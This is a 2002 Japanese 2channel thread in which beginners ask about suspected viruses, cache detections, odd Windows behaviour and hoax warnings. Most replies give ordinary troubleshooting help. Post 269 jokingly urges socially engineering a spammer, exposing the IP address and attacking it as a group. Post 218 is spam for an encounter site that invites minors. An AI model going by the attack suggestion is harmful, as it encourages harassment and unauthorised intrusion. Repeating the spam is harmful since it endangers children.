FBIへtelnet(・∀・) :02/08/12 17:59
突然マシンがFBI(www.fbi.gov)やwww.army.milや、www.yahoo.comのtelnet、smtp、pop3のポートへアクセスしだした!!! 特別実行ファイルを動かした記憶はないんですが。。。 Outlookも使ってないし、メールを開いたとかじゃあないんです。 どなたか原因となってそうなウイルスとかご存知ないですか??? 初心者丸出しでごめんなさい。どなたかご存知中田、お願いします。
202 :
名無しさん@お腹いっぱい。 :02/08/12 18:30
203 :
名無しさん@お腹いっぱい。 :02/08/12 19:08
メモリ上でウィルスは見つかりませんでした。 スキャンしたファイルの中に 1 つ以上のウィルスが検出されました。 メモ: スキャンを終了する前に中止しました。このコンピュータ上にはさらに感染ファイルがあるかもしれません。 この問題を解決するには: 修復に役立つ総合的なウィルス対策プログラムの購入をご検討ください。 または、次のファイルを削除します: スキャンを実行していません。 ウィルススキャンを開始するには、 ここをクリック. c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\U5QF8P2V\-100[2] は 次のウィルスに感染しています: VBS.Internal c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています: VBS.LoveLetter.Var どうしたらいいの?
ありがとう。 でもみつからなかた。。。 おとなしく再インストールします。
205 :
名無しさん@お腹いっぱい。 :02/08/12 19:29
>>203 面倒だ。「ツール」→「インターネットオプション」 から一時ファイルの削除をしろ。
vbsはこのスレでも書かれまくってるのに・・・
ニュー速馬鹿は過去ログ読まないって事ですな
207 :
名無しさん@お腹いっぱい。 :02/08/12 19:33
>>204 ちゃんと必要な設定のバックアップとっとけよ!
てか、それごときで再インスコしてたら・・・
ファイヤーウォール入れてポート閉じておけ!
できんか・・・
使ってるOSくらい書けよな。msconfigでスタートアップを見るとかさ。
Ad-aware使うとか。いろいろ試す楽しみがあるのによ!
208 :
名無しさん@お腹いっぱい。 :02/08/12 20:22
昨日から、エクスプローラーの最小化、最大化の ボタンの文字が気持ち悪くなりました。 これはウィルスなのでしょうか?
212 :
名無しさん@お腹いっぱい。 :02/08/12 20:51
>205 削除しました。
>>212 はい、それでもう検出されません。ついでに過去レス読んでおいてね。
214 :
名無しさん@お腹いっぱい。 :02/08/12 21:34
>213 ういーす。
>213 スキャンしたら :\RECYCLED\DC10 は 次のウィルスに感染しています: VBS.Internal c:\RECYCLED\DC12 は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\G71RM2Z5\index[2].html は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています: VBS.LoveLetter.Var c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています: VBS.LoveLetter.Var こうなってます。 疲れました・・・
217 :
名無しさん@お腹いっぱい。 :02/08/12 22:52
>>215 過去レス読んだ?このVBS.Love Letter...は無害だから。
それに、削除したファイルはごみ箱に行くことは知ってるよね?
C:\Recycledってのはごみ箱のことです。中身空にすりゃいい。
あと、削除作業してからまた2ちゃん見たでしょう。それでキャッシュファイルが
再度できちゃってるね。とにかく過去レスに該当ウィルス(?)のスレが載ってるから
見てみなよ!
218 :
コギャルとHな出会い :02/08/12 22:54
http://kado7.ug.to/net/ 朝までから騒ぎ!!
小中高生
コギャル〜熟女まで
メル友
i/j/PC/対応
女性の子もたくさん来てね
小中高生大歓迎です
全国デ−トスポット情報も有ります。
全国エステ&ネイル情報あります。
激安携帯情報あります。
女性の子…文がおかしいな(w コピペに突っ込みなのでsage
>>219 額面上だけ丁寧にして引き寄せようという罠。
あまりに見え透いている。
221 :
名無しさん@お腹いっぱい。 :02/08/12 23:13
>217 失礼しました。 「オフライン・・・」にチェック入れずに削除 してました。 今、スキャンしたら感染0でした。 ふうう・・・
教えていただきたいのですが、 ウイルスにやられたみたいなんです。 症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、 「スクロール」するやつがありますよね。 マウスで左クリックして、押したままにして、上下に動かすやつです。 そのスクロールするやつが、なにもマウス操作もしていないのに、 勝手気ままに上下動を繰り返すのです。 そんなもんだから、IEブラウザも、じっくり見ていられません。 どう対処すればよろしいのでしょうか?
>>223 削除方法、教えていただけませんでしょうか?
あと、なんのウイスルかもわからないもんで・・
225 :
名無しさん@お腹いっぱい。 :02/08/12 23:32
最大化、最小化、閉じるなどのアイコンが 数字などになったんですがこれってウィルスですか?
608 名前:ちびた 投稿日:02/08/12 23:16
教えていただきたいのですが、
ウイルスにやられたみたいなんです。
症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、
「スクロール」するやつがありますよね。
マウスで左クリックして、押したままにして、上下に動かすやつです。
そのスクロールするやつが、なにもマウス操作もしていないのに、
勝手気ままに上下動を繰り返すのです。
そんなもんだから、IEブラウザも、じっくり見ていられません。
どう対処すればよろしいのでしょうか?
609 名前:ちびた 投稿日:02/08/12 23:20
すみません、上の書き込み、書くスレ間違えました。
無視してやってください。
よろしければ、こちらへ・・・
http://pc.2ch.net/test/read.cgi/sec/1027397623/ ネタ決定
そんなの貼りつけてどうすんの?
230 :
名無しさん@お腹いっぱい。 :02/08/12 23:49
>>227 ありがとうございますた。
危うく初期化するところでした、マジで。
>>224 笛かよ。w
そんなウィルス聞いたこと無いよ。接続はダイアルアップ?
オンラインウィルスチェックってのもあるけど試す?
このスレの
>>1-2 を見る。
>>224 その現象が起きたきっかけは?
いちおうOSとIEのバージョンと入れているウイルス対策ソフトの名前も聞いておこうか。
予想 Windows 95 IE 4 SP2 ウイルスバスター97
>>197 それ来たよ。あと Windows XP Patch なんていうのもあった。
>>227 セーフモードではなおりませんでした。
>>232 ADSLです。
オンラインウィルスチェックなんてあったんですね。
ありがとうございます。現在、それをやっているところです。
でも、まだおわらないとこみると、結構時間かかるんですね。
情報、感謝です。
>>233 きっかけは、わからないんです。
ウイルスメールは、2週間に1回ほどきますけど、
開かずに、ちゃんと削除してるので問題ないと思いますし。
OSはwindows98、IEは5.50.4807.2300です。
みなさま、ありがとうございます。
なおらなかったら、またお聞きしていいですか?
オンラインウィルスチェックの結果は、ウイルス無しです。 ということは、いったい、どういうことなのやら・・ 勝手にスクロールするこの症状、超むかつきます。 ここに書き込むのさえ、一苦労。 どうすれば、なおるのでしょう?(泣)
>>240 なるほど。
やりかたがわからないけど、
トライしてみます。
マイクロソフトのホームページいって、
ダウンロードする方法でOKなのかな。どれどれ・・
>>241 >ダウンロードする方法でOKなのかな。
ダウンロード??
まぁ、いいや。
徐々に謎が解けるから、がんばれよ。
IE6にしたけど、
解決せず。
どーーなってんのーー
>>242 だめでした。
244 :
名無しさん@お腹いっぱい。 :02/08/13 03:08
再インスコ
なんで寄ってたかって真正面でとらえるの? オレはマウスの故障に一票だ! つーかそれって定番ネタだと思う
>>246 んじゃ俺はキーボードが原因に500ウォン
『KELDCIKE.EXE.htm(642□□□)』という添付ファイル付きのメールが 送信者・件名がブランクで届きました。 これってウイルスでしょうか…? symantecや検索サイトで検索してもヒットしませんでした。
Macromedia Flash Playerのセキュリティー上の欠陥ってなに?
251 :
名無しさん@お腹いっぱい。 :02/08/13 10:54
今日、閉じるや最大、最小のボタンが数字になってたので、加入してるサポートセンターに
電話で尋ねて、解決法を教えてもらい試したが直らなかった。そしたらそこの男は
修理に出すしかないと言った。どうしても納得いかなかったので解決法はないかと2chへ
来てこのスレ見たら、既出の質問で、
http://.winfaq.jp/へ行ったら解決できました 。
糞野郎のせいで危うく修理にだすとこだった。それと携帯から電話したので140円もかかった。
改めて2chの凄さを知った。最初からここに来ていれば・・・
>>251 ブラウザのセキュリティレベルを見直さないとまた食らうぞ。
何のサポートか知らんが、自分で食らった不正プログラムの始末まで
面倒見るサポートはないと思うぞ。なんでも人のせいにするなよ。
>>251 はじめから自分で調べようとはしないのね
>>252 フォントキャッシュが壊れていただけで
不正プログラムは関係ないと思われ
255 :
名無しさん@お腹いっぱい。 :02/08/13 11:16
つーかセキュリティとかんけーない
>>251 サポートセンターに
「その程度のことで電話してくるような輩は埒があかないので修理」
って思われたんだよ
258 :
名無しさん@お腹いっぱい。 :02/08/13 11:24
ネット関係→セキュリティー→ スレッド一覧にいったら VBS.LoveLetter.Var ウィルスに感染しました 私は除去しましたが 気をつけてください。また 誰か詳しい方 調べてください。
259 :
名無しさん@お腹いっぱい。 :02/08/13 11:26
260 :
名無しさん@お腹いっぱい。 :02/08/13 11:30
261 :
名無しさん@お腹いっぱい。 :02/08/13 11:41
共有を使って自己複製するタイプのワームで、LAN内で感染しているPCを 一発で特定するいいツールって無いですかね? 例えばLANを経由して共有フォルダのファイルを操作したログを自動的に 取る様なソフトとか・・・
262 :
名無しさん@お腹いっぱい。 :02/08/13 13:20
>>222 (ちびた)
やっぱり他の人が言うようにマウスかなにかの不具合かも知れないよ?
まあよくわからんけど、俺だったらコントロールパネルのマウスのプロパティで
設定を変えてみて様子を見る。自分のPCではタッチパッドなので、エッジモーション機能が
(パッドのはしっこをいじるとスクロールする)なにか関係したりしないかなあ、とか。
どうしても直らないならマウスのドライバをインストールし直すかな。
入力関係が正常なのにその現象が常時起きるなら背後で動くアプリが有るはず。
msconfigからスタートアップタブを見る、またはレジストリで該当箇所を確認。
でも人のPCだからホントにわからないねえ。マウスの設定で、スクロールできる方法を
全部OFFにしてみたら?惰性を使用するってのもあったね。
>>222 使ってるマシンは、ノート?
タッチパッドだとすると……………
265 :
名無しさん@お腹いっぱい。 :02/08/13 19:16
macro virusをノートンが検出しましたがどうしたらよいのでしょうか? 2ちゃんねるをリロードすると検出されましたが。
266 :
ひみつの検疫さん :2024/12/20(金) 14:16:30 ID:MarkedRes
汚染を除去しました。
267 :
名無しさん@お腹いっぱい。 :02/08/13 19:36
268 :
名無しさん@お腹いっぱい。 :02/08/13 19:41
ニュー即+で張り幕ってル奴がいるのですがどうしたらよいでしょうか?
>>268 ソーシャルかけておいこんでIPアドレスさらしたらみんなで
おもいおもいにこうげきする。
チームワークがぢゅうようだよ。
ハニーポットたてるのもいいかもね。
270 :
名無しさん@お腹いっぱい。 :02/08/13 20:30
HDDからCIHを検出。アブネーアブネー。
>>270 おやぁ?今時って感じなんだけど。誤検出じゃなくて本当に?
レスありがとうございます。 もうだめだ(死 くそ、まじむかつく。 まだ直らず。 もうパソできん。
>>262 いろいろありがとうございます。
コントロールパネルのマウスのプロパティをいじろうとしたんですけど、
このときも、症状がでてしまい、勝手に設定が変えられてしまうんです。
もうどうしようもない。
つまり、いかなる状況においても、マウスの中央のボタンみたいなのが
勝手に転がってしまっているっていう状態なんです。
やっとのことで設定を変えても(中央ボタンを無効にした)、 症状があらわれるのです。 msconfigとか、レジストリとかは、初心者なので、さぱーりわかりません。 惰性とは何でしょうか?
マウス引っこ抜いてみれば tabキーと矢印キーでも操作できるっしょ
>>275 だからマウス換えてみろって500円のとかでいいからさ
じゃなきゃとりあえず
>>276 の言うようにマウスレスにしてみる!
278 :
名無しピンチ :02/08/14 04:03
PC起動して、動作が変だと思いHDD見たらローカルディスク:C の容量が少しずつ減っていき(2〜4Mずつくらい)、空き容量が1G→200Mになりました。 ディスククリーンアップをすると元の容量になるのですが、また 減っていきます。これはウイルスでしょうか? 即レスお願いします(o_ _)o
>>278 OSくらいは書くべきでは?
怪しい物が動いているか調べたいならタスクマネージャで
挙がるものをリストしてみれば良い
こんなとこで即レスなんとかってやめとけよ
失礼なだけだ
280 :
名無しピンチ :02/08/14 04:26
>>279 OSはWindowsMeです、忘れてました。
タスクマネージャはどこにあるのでしょうか?
281 :
名無しピンチ :02/08/14 04:32
↑特に怪しいものは動作していないようです。
Meは裏でなに動いてるか解らんから プロセス監視ツールかなんかでもっかいチェックしれ
>名無しピンチ IEのキャシュは何MBに設定している?
285 :
名無しピンチ :02/08/14 05:20
>>282 ,
>>283 さん
ありがとう〜。ソフト使ってみたけどよく分かりませんでした(ぉ
>>284 さん
IEのキャッシュ・・・ですか?そこらへんはいじったことないので
よくわかりません><
IEのキャッシュはどうやればわかりますか?
287 :
名無しピンチ→多分解決 :02/08/14 05:58
>>286 さん
↑のサイト逝ってきました。
ローカルディスクの容量が増え、とりあえず解決したようです
どうもありがとうございました〜m(_ _"m)
こんどは、OSの文字化け。 最悪
>>288 おめでとう。
つーか、サポートに聞けよ。
すでに板違いだしな。
>>ちびた どうせフォントキャッシュのアレだろ? winFAQとか検索しなよ
今日ノートンを買ってきて、いれました。 ウィルススキャンしたところ、「Macro.src]というウィルスが 検出されました。 修復できないらしいんで、検疫のところにいれてあるんですが、 削除するべきですか? ほんと何もわからなくて・・・お願いします。
>>293 181 名前: ひよこ名無しさん 投稿日: 01/12/08 14:42 ID:Wz7+XgCU
WinMeでIE6とメーラーは、Outlookを使っています。
プレインストールされていたMacfeeとトレンドマイクロのオンラインウイルススキャン
では、何もでませんでしたが、シマンテックのオンラインスキャンで、一つのファイル
が感染していると云われました。
C:/WINDOWS/TemporaryInternetFiles/Content.IE5/A9T9C750/sec[2]
Macro.src
それで、Macro.srcというののことをシマンテックのサイトで調べましたら、
特に詳しいことは書いていなかったのですが性質がワイルドと書いてありました。
皆様にお聞きしたいのは、この、『性質がワイルド』というのはどういうことか
ということと、このファイルを削除してしまっても、システムに問題など起こらないか
ということです。
あと、もう一つ、ノートンは、PCとの相性があると聞いたことがあるのですが、
本当ですか?(私のPCはバイオのノート型なのですが大丈夫でしょうか)
183 名前: ひよこ名無しさん 投稿日: 01/12/08 14:44 ID:???
<181
C:/WINDOWS/TemporaryInternetFiles/にあるファイルは削除しても問題ない。
>294 ありがとうございました!! 同じケースでした。 既出なのにわざわざすみませんでした。
>>290 様
「フォントキャッシュのアレ」とは、なんのことでしょうか?
すんません、教えてくださいませ!
オンラインウイルスチェックでは、感染してないと出ました。
>296 もういい加減セキュリティとは関係ない。 ここまで。
299 :
将軍(カリンカ命) :02/08/14 17:51
>DSL導入時のウイルスバスター2001への対策
http://www.trendmicro.co.jp/product/vb2001/adsl.htm 一部機能をレジストリキー削除でスタートアップから外すんですが、
その後の再起動から、Explorerがログイン後バスターのスタートアップ時にに落ちることがある。
数回あとの再起動時、プロンプトからGUIに切り替わってすぐにブルーバック
メモリのどっかがトラブって、ダンプしていますという表示のままフリーズ
そのあとから、ログイン画面でctrl alt del押下時に、入力画面の前に
タイトルバー”・”メッセージ”・”OKボタンのみのポップが出るようになった。
再診パターンファイルのVB2001で検索してウイルスなし。
これは単にレジストリぶっ壊れですか?
66.115.46.194,ms-sql-s をブロックしました。 詳細: インバウンド TCP 接続 ローカルアドレス、 サービスは 10.224.72.159,ms-sql-s リモートアドレス、 サービスは 211.178.91.133,4710 プロセス名は N/A
301 :
名無しさん@お腹いっぱい。 :02/08/14 18:24
昨日今日と添付ファイル付メールがきました。 タイトルは英文、中身も英文、ファイル名は「no_failname」と怪しさ全開です。 でも、ノートンは全く反応しません。 もちろんウィルス定義は最新です。 新しいウィルスなのでしょうか・・・?
303 :
名無しさん@お腹いっぱい。 :02/08/14 18:48
>>301 それだけの情報ではわからない。
個人的にはKlezの壊れたヤシのような気がするが。人柱になるのが嫌なら捨てる。
>>301 SARCにでも提出しろ。
「その方法は?」はあらかじめ却下。マニュアル読め。
ファイヤーウォールでZONEARAMEと言う奴を使っていたのですが 使い勝手が悪いので初心者でも簡単に使えるファイアーウォールを教えてください
見覚えがあるような、ないような(ハッキリ覚えていないのです・・・)人から メールが来ました。 なんでも、jdbgmgr.exeという、ノートン先生などでは みつけられないウィスルだから削除しろと書いてありました。 さっそく検索してみたらそのファイルがみつかりました。 ウィルスバスターはこのファイルにウィスルは検出されなかったと言っています。 「14日間静かにしていて14日後 にシステムを破壊する」とメールに 書いてあるのですが、Cドライブに見つかったこのファイルの作成日は5月で、 とっくに14日経っているのですが・・・? 今のところどこを破壊されたのかよくわからないので、不安です・・・。 どうしたらいいのでしょうか・・・。
>306です。 メールを送ってきた相手は、以前オークションで取引きをした相手でした。
309 :
名無しさん@お腹いっぱい。 :02/08/14 19:31
>>305 XPでも買えば。デフォルトで入ってるぞ。
つーか、使いにくいなら使うな。
ウフッ
>306-307 レスありがとうございました。 デマですか。 どうもおかしいなとは思っていたのです。 ケコーンおめでとうございます。
>>298 さま
ありがとうございます。あなたは神です。
セーフモードにしたら、文字化けはなおりました。
しかし、スクロールのほうは、いまだなおっておりませんが(死
>>302-304 レスありがとうございます。
「添付ファイル開いてみたい!」と思います。でもやはり止めときます。
即ゴミ箱に捨てていますが、ノートンが反応しないのが不思議で。
今度来たら捨てずにSARCに提出してみます。
ありがとうございました!
>>316 FinalDataか何か持ってないの?
もったいない。passwor+zip圧縮で保存しなさい。
>>317 passwor< これ凄いよね!!
1024bitのEnCrypterでしょ?
PGPなんて目ぢゃないね。
・・んで、どこで落とせるの??
319 :
GPX ◆Ninja4PY :02/08/14 23:49
質問させてください 多分ですがトロイを仕組まれたようです。環境は Win2K(SP3) ノートン2001(パターン最新) BlackICE(最新) DSL常時接続 にて使用しています。 昨日BlackICEで突然15件ほど一気にアタックを受けた後に Administrator権限でもアプリ(全て)の起動ができなくなり、 System32フォルダへのアクセスができなくなりました。 とりあえず自分でサイトを回って調べたのですが、どれにやられたのかがわからずに困っています できるだけ仕事などのファイルはサルベージしたいのですが、どうすれば良いでしょうか?
>>319 パターンファイルの日付は?
Norton Internet Security だけっていう落ちはないよね。
最悪、別のPCにつなげてサルベージ。
>>319-320 さん
レスありがとうございます。
Runasですが、実行を拒否されますた(T-T)
パターンファイルは多分最新です(11日に更新しています)
スペアマシンにつないでサルベージですかね...やっぱ
土日に頑張って200G助けてみますです(号泣)
324 :
名無しさん :02/08/15 00:16
>>323 さん
これは知りませんでした。
regeditはタスクマネージャーからのみ呼び出しができますが、
レジストリ周りは私がそんなに詳しくないのでどうにも...
ただ自動実行のあたりのキーは変なものはなかったです。
起動するたびにどんどん動作が怪しくなってますので、いじらない方が無難かも
サルベージの時に紹介していただいたソフトも使ってやってみます
>>326 一応、使ったことはないので保証はできないけどね。
どこかのPC系ニュースサイトで見た記憶があるから、それなりに使えるかもしれない、というだけ。
マターリがんばれ。
328 :
名無しさん@お腹いっぱい。 :02/08/15 00:42
windows2000ユーザなのですがwinntの中に”藁”とか”・”とかっていう ファイルがありました。 これって何かのウイルスに感染してるのでしょうか? 不安でしょうがないです。。。
>>328 まず、ウイルス対策ソフト名は?
定義ファイルはいつのだ?
スキャンした結果は?
拡張子はないのか?
ネタ決定まであと2レス。
mcafeeのヴィールススキャンです。 定義ファイルは最新ものです。 スキャン結果は異常なし 拡張子はなしです。 ほかに”・”ってファイルもありました・・・。
>>330 ファイルのタイムスタンプに思い当たることは?
最近何か普段と違うこと(インストールとか添付ファイルを開いたなど)をした記憶は?
何もなければ削除してもかまわんと思う。
暇ならSARCにでも提出してみたら?
バイナリエディタで開いてみるとか。
332 :
名無しさん@お腹いっぱい。 :02/08/15 09:07
あのfree.Links B に感染してしまったのですが, 感染されていると思われるC:/WINDOWS/TemporaryInternetFiles/Content.IE5 にあるファイルを手動で削除しましたが, その後スキャンしても検出しなかったのですが, これで大丈夫だったのでしょうか?ちなみにウィルスソフトは, Norton AntiVirus 2002,メールソフトはNetscape6.21です。 OSはXP,IE6 宜しくお願いします。
333 :
名無しさん@お腹いっぱい。 :02/08/15 09:47
昨日ノ-トソがVBS.LoveLetter.Verに感染しています。 の警告が出て、削除しようとしたらファイルへのアクセスが拒否されますた。 それでコンピュ−タをウィルススキャンしてみましたら 緊急注意からシステムOKになっていました。 いったい何なんでしょうか? 詳しい方どうかレスお願いいたします。
>>335 さん
ありがとうございました。
そうゆう事でしたか。
すごくストレスになっていたのでホットしました。
初心者ですいませんでした。
337 :
名無しさん@お腹いっぱい。 :02/08/15 18:57
age
338 :
名無しさん@お腹いっぱい。 :02/08/15 19:46
なんか画面にピースマークの偽者見たいなのが いっぱい暴れ回ってたんですけどウィルスですか? パソコン買ったばかりなので、誰か教えて下さい。
>>339 ウィルス駆除ソフトとかで何とかなるんですか?
何度もすみません。何かが消えたとかはないんですが。
>>340 はい。キミの使うPCのOSと接続回線の種類、入れている対ウィルスソフトの名前などを
書いてください。ピースマークの偽者はPCを起動してから終了するまでずっと画面にいるの?
342 :
名無しさん@お腹いっぱい。 :02/08/15 20:07
すいません、OSとか言われてもよくわかりません。 偽者はいないん電源が切れていなくなったんですけど すぐパソコンが止まって強制終了とかもできなくなったりします。 素人すぎてすいません。
>>342 買ったばかりでかぃ。たまらないね。
OSというのはたとえばWindows XPとかMeとか98とか、そういうの。
接続は常時接続じゃないね?ADSLとか。
>>342 大変だね。
とりあえずつながってる回線引っこ抜いて、有料PCサポートに電話してごらん。
3万円もあれば再インストールからアプリの導入までやってくれるよ。
345 :
名無しさん@お腹いっぱい。 :02/08/15 20:14
xpです。ADSLと思います。ウィルスソフトはないので買いに 行こうと思ってます。どれがいいとかがわからないので。
>>342 買ってからどんなソフトを入れたの?ゲームとか?
いちどスキャンディスクをしてみて。スタートからプログラム、アクセサリ、
システムツールとたどっていけばみつかるから。チェック方法は「標準」でやればいいよ。
(「完全」でなくて)
347 :
名無しさん@お腹いっぱい。 :02/08/15 20:19
みなさんやさしいですね。ありがとうございます。
>>344 電話してみます。
>>346 システムツールの次何をしていいかわかりません。
すいません。
>>347 システムツールの次にいろいろ名前が出る中に、スキャンディスクってのがあるよ。
349 :
名無しさん@お腹いっぱい。 :02/08/15 20:27
>>347 ありがとうございます。がんばってなんとかしてみます。
私の中では347さんが神ですよ!
350 :
名無しさん@お腹いっぱい。 :02/08/15 20:27
>>349 一応聞いておくけど。
再起動はしてみた?
んで、ミ田(ウインドウズキー)+R
もしくはスタートメニューの「ファイル名を指定して実行」で
msconfig
でスタートアップを全部無効にしてみるとか。
まだウイルスと決まったわけじゃないし。
353 :
名無しさん@お腹いっぱい。 :02/08/15 20:39
>>347 (これはキミだ)
で、ADSLなら話は速い。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html このページの上にあるダウンロードをクリックし、次のページの使用許諾条項に「同意する」を
クリック、簡易版のアンチドートをDLして。使い方は最初のページにリンクがあるから
そこから読んでみる。それでうまく使えたら、PCが今ウィルスに感染しているかどうか
わかるから(ファイル等全部OKなら感染していない)、もしウィルスの名前が出たら
それをカキコしてくれればいいよ。
あ、今351を見たけども、今回大したことがなくてもこのアンチドートはいざというときに
使えるから、お気に入りにでも入れて覚えておいて。(使うたびに最新のをDLすること)
あと、金があれば何か常駐するウィルス対策ソフト買って入れてください。ただのでも
いいけどね。このスレの
>>2 を参考に。
殺伐としたスレが多い中、久しぶりにマターリしたよ。(W
今スキャンディスクっていうのしてきました。以外に早く済みました。 それで話を聞いてもらったみなさんには悪いんですがなんか直ったっぽいです。 本当におさがわせしました。そしてありがとうございました。 347って私でしたね(w
357 :
名無しさん@お腹いっぱい。 :02/08/15 21:15
ブラクラだったに決定 でもせっかくセキュ板まで来たんだから フリーでいいからアンチウィルスソフトいれなさい
359 :
名無しさん@お腹いっぱい。 :02/08/15 22:39
質問です。 知り合いがどうやらウイルスに引っかかったらしいのですが、、、 症状は BIOS後にネットワークに接続となってOS(win98)が起動出来なくなった との事ですが、これだけでウイルスの名前判りますか?
どうもでした
>>353 レスサンクス!
ノートンを入れていますが反応しない物もあると聞いて
不安だったのです。
>個人的にはソフトウェア板でVixは危険ですか?って聞いて
>思いっきり罵倒されて来い、と思う
それもまた一興(W
364 :
名無しさん@お腹いっぱい。 :02/08/16 15:54
age
>>366 ありがとうございました。
治りました。
368 :
名無しさん@お腹いっぱい。 :02/08/17 05:43
ウィルス付きのMP3ってどうやって被害を与えるのでしょうか? 普通に聞いてても発症するんですか?
369 :
名無しさん@お腹いっぱい。 :02/08/17 05:54
mp3ファイルって主に再生する以外に何に使うんだろう? その主たる使用方法で発症しないとしたら ウィルス仕込むことに何の意味があるんだろう?
370 :
名無しさん@お腹いっぱい。 :02/08/17 06:21
373 :
名無しさん@お腹いっぱい。 :02/08/17 10:20
daan 8月13日 火 133kb Hi,(ぼくのname),questionnaire ヤフーのメイルBOXにこんなのがあります。クリックすると自分のパソコン壊さ れますか?どうしても読みたい場合、マンガ喫茶のパソコンを使えば平気なので しょうか。
>>373 開かずに捨てる。
自分のPCじゃないからいいという考えは捨てろ。
375 :
名無しさん@お腹いっぱい。 :02/08/17 12:31
ダイヤルアップで接続が完了したときにフロッピーを読みにいくように なってしまいました。 どこに接続しているかは関係ないようです。 ウィルスなんでしょうか?
2Chの掲示板見てたら(Macro.src)に 感染しました。ファイルの修復はできないのか誰か教えてー
>>373 メールヘッダを書き込んでくれ!!!!!!!!!!!!!!!!!!
ヤフーはhtmlメールをそのまま開かない。
意図的に添付ファイルを開けば感染。
378 :
pe_nimda.e :02/08/17 14:48
昨日の晩からウィルスメールが山ほど送られてます。。。
送信者
[email protected] 。
1分に1通です。
んで、質問です。
・サーバーが応答しません。って出て6通ずつしかメールを取り出せません。
まだサーバーに何百通(orそれ以上)もメールが溜まっていると考えられる
んですが、6通ずつじみちに取り出すしか方法がないですか?
>>378 DLしないでサーバ上で削除すれば。OEだったら知らんけど。
Vectorにも色々あるでしょ。
>>378 **通受信中と表示されるはず。
添付ファイルをサーバーで削除にする。
382 :
pe_nimda.e :02/08/17 16:08
無知ですみません。自分でも調べているのですが。
サーバー上で削除するってのは自分でできるんですか? プロバイダ(ゼロ)には「削除して欲しい」っていうメールを書きました。
送受信すると12通受信中って出て、7通目でサーバーが応答しなくなります。 その繰り返しです。来ているメールは ・1通目、添付ファイルあり
The original message was received at Fri, 16 Aug 2002 23:44:08 +0900
from tky08-f232.alpha-net.ne.jp [61.205.39.232]
----- The following addresses had permanent fatal errors -----
<
[email protected] >
----- Transcript of session follows -----
... while talking to mx07.hotmail.com.:
>>> RCPT To:<
[email protected] >
<<< 552 Requested action not taken: exceeded storage allocation
554 <
[email protected] >... Service unavailable
・2〜5通目はundeliveredの通知
・6通目は
┏━━━━━━━━━━【ご確認下さい】━━━━━━━━━━┓
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
「healthクリック」が提供しております健康情報メールマガジン 「ヘルスケア・マガジン」への退会申し込みをいただきましたが、
ご入力いただいたアドレスは登録されておりませんでした。 転送の設定などをご確認の上、お申し込みいただいているアドレスから
再度解除のお申し込みをいただきますようお願い申し上げます。 なお、ご不明な点は mailto:
[email protected] までお願いします。 ■━━ヘルスケア・マガジン━━━━━━━━━━━━━━━━┓ [編集発行責任者]
株式会社NTTデータ healthクリック事務局 〒135-6033 東京都江東区豊洲3-3-3 豊洲センタービル [お問い合わせ窓口]
mailto:
[email protected] ┗━━━━━━━━ Copyright(C) 2000 NTT DATA ━━━━━━■
>>382 nPOPで検索してみ。自分で削除出来るよ。
384 :
pe_nimda.e :02/08/17 16:28
>382 今からやってみます。ありがとう。
385 :
pe_nimda.e :02/08/17 16:55
>382 削除できました。ほんとありがとう。 サーバー上には6通ありました。 あれ?6通しかないのか???と思い、アウトルックで受信してみると、 状況は前と変わらず、6通取り出して応答不能。6通取り出して応答不能。 の繰り返し。 サーバー上の6通を削除してみると、アウトルックでは受信件数0となりました。 つまり、アウトルックで取り出したメールがサーバー上では取り出せていない。 サーバー上に同じメール(6通)が常時滞在し、 アウトルックで受信するたびに同じメールを取り出している。 ってことなのかな
386 :
名無しさん@お腹いっぱい :02/08/17 18:13
はじめまして。 いきなりですみませんが、今朝方(午前8時ごろ)ネットに接続中、 知らない間に "crackler.exe" というファイルが、c:\windows\temp 上に展開されていました。\temp の下には ナントカ とかいう(名前忘れました) ディレクトリが作られていて、そのなかに \crackler というフォルダが 作られていました。 気が付いたのは、PCが異常を感知し、メッセージを表示していたからなんですが、 このファイルはいったい何者なんでしょう。 怖かったので、EXEファイルと\tempの下のフォルダごと削除しましたが、 今後、どうすればいいでしょうか? いちおう、マカフィのウィルス・スキャンを入れているんですが、 ウィルスは駆除できても、不正進入(ハッキング?)にはお手上げなんでしょうか? (分かりづらくてすみません。今のところ実害はないです) よろしくお願いします。
387 :
名無しさん@お腹いっぱい。 :02/08/17 18:45
そりゃまぁ、
アンチウィルスソフトはパーソナルファイアーウォールじゃないからね・・・
文面からなんとなく
馬鹿フィはPCのプレインストールでウィルス定義は最新かどうか怪しい上に
IEをパッチあてないでつかってて
あまつさえOEを「メールのプレビュー」にチェックしたまま使っている・・・
そんな匂いがするんだが、どう?
>>386
388 :
名無しさん@お腹いっぱい :02/08/17 19:28
>>387 レスありがとうございます。
そうですか、マカフィは馬鹿ですか。。。
ウィルス定義は最新です。
